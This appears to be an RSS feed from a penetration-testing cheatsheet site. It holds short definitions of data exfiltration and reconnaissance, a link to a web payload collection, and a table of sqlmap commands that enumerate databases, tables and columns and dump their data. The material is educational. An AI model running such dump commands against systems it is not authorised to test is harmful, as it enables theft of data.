<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Web on nix4cyber</title><link>/cheatsheets/web/</link><description>Recent content in Web on nix4cyber</description><generator>Hugo</generator><language>en</language><copyright>Copyright (c) 2025 nix4cyber</copyright><atom:link href="/cheatsheets/web/index.xml" rel="self" type="application/rss+xml"/><item><title>Data Exfiltration</title><link>/cheatsheets/web/data-exfiltration/</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>/cheatsheets/web/data-exfiltration/</guid><description>&lt;p>Data Exfiltration is a post-exploitation technique used in cybersecurity to secretly and successfully transfer sensitive, unauthorized data from a protected network or computer system to an external location, often bypassing security controls and monitoring systems.&lt;/p></description></item><item><title>Discovery</title><link>/cheatsheets/web/discovery/</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>/cheatsheets/web/discovery/</guid><description>&lt;p>&lt;strong>Discovery&lt;/strong>, often known as &lt;strong>Reconnaissance&lt;/strong> or &lt;strong>Information Gathering&lt;/strong>, is the crucial initial phase in any security assessment or penetration test where the objective is to passively and actively find targets, map network topology, enumerate subdomains, locate hidden files, and identify potential points of entry before attempting exploitation.&lt;/p></description></item><item><title>Resources</title><link>/cheatsheets/web/resources/</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>/cheatsheets/web/resources/</guid><description>&lt;div class="card-nav d-flex flex-column flex-sm-row">
 &lt;div class="card text-end w-100">
 &lt;div class="card-body d-flex">
 &lt;div class="d-flex flex-column me-auto text-start">
 &lt;h5 class="card-title my-0">&lt;a href="https://swisskyrepo.github.io/PayloadsAllTheThings" target="_blank" class="stretched-link text-reset text-decoration-none">PayloadsAllTheThings&lt;/a>&lt;/h5>
 &lt;p class="card-text mt-1">A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques!&lt;/p></description></item><item><title>SQLmap</title><link>/cheatsheets/web/sqlmap/</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>/cheatsheets/web/sqlmap/</guid><description>&lt;p>SQLmap is an &lt;a href="https://github.com/sqlmapproject/sqlmap">open-source tool&lt;/a> that automates the detection and exploitation of SQL Injection vulnerabilities. It is the essential tool for web penetration testing.&lt;/p>
&lt;h2 id="basic-commands">Basic Commands&lt;/h2>
&lt;table>
 &lt;thead>
 &lt;tr>
 &lt;th>Action&lt;/th>
 &lt;th>Command&lt;/th>
 &lt;/tr>
 &lt;/thead>
 &lt;tbody>
 &lt;tr>
 &lt;td>Simple test&lt;/td>
 &lt;td>&lt;code>sqlmap -u $url&lt;/code>&lt;/td>
 &lt;/tr>
 &lt;tr>
 &lt;td>POST Request&lt;/td>
 &lt;td>&lt;code>sqlmap -u $url --data &amp;quot;username=test&amp;amp;password=test&amp;quot;&lt;/code>&lt;/td>
 &lt;/tr>
 &lt;tr>
 &lt;td>List databases&lt;/td>
 &lt;td>&lt;code>sqlmap -u $url --dbs&lt;/code>&lt;/td>
 &lt;/tr>
 &lt;tr>
 &lt;td>List tables&lt;/td>
 &lt;td>&lt;code>sqlmap -u $url -D $dbname --tables&lt;/code>&lt;/td>
 &lt;/tr>
 &lt;tr>
 &lt;td>List columns&lt;/td>
 &lt;td>&lt;code>sqlmap -u $url -D $dbname -T $table --columns&lt;/code>&lt;/td>
 &lt;/tr>
 &lt;tr>
 &lt;td>Data Dump&lt;/td>
 &lt;td>&lt;code>sqlmap -u $url -D $dbname -T $table -C &amp;quot;COL1,COL2&amp;quot; --dump&lt;/code>&lt;/td>
 &lt;/tr>
 &lt;/tbody>
&lt;/table>
&lt;h2 id="injection-techniques">Injection Techniques&lt;/h2>
&lt;p>SQLmap can use various techniques to extract data. You can specify them to refine your search.&lt;/p></description></item></channel></rss>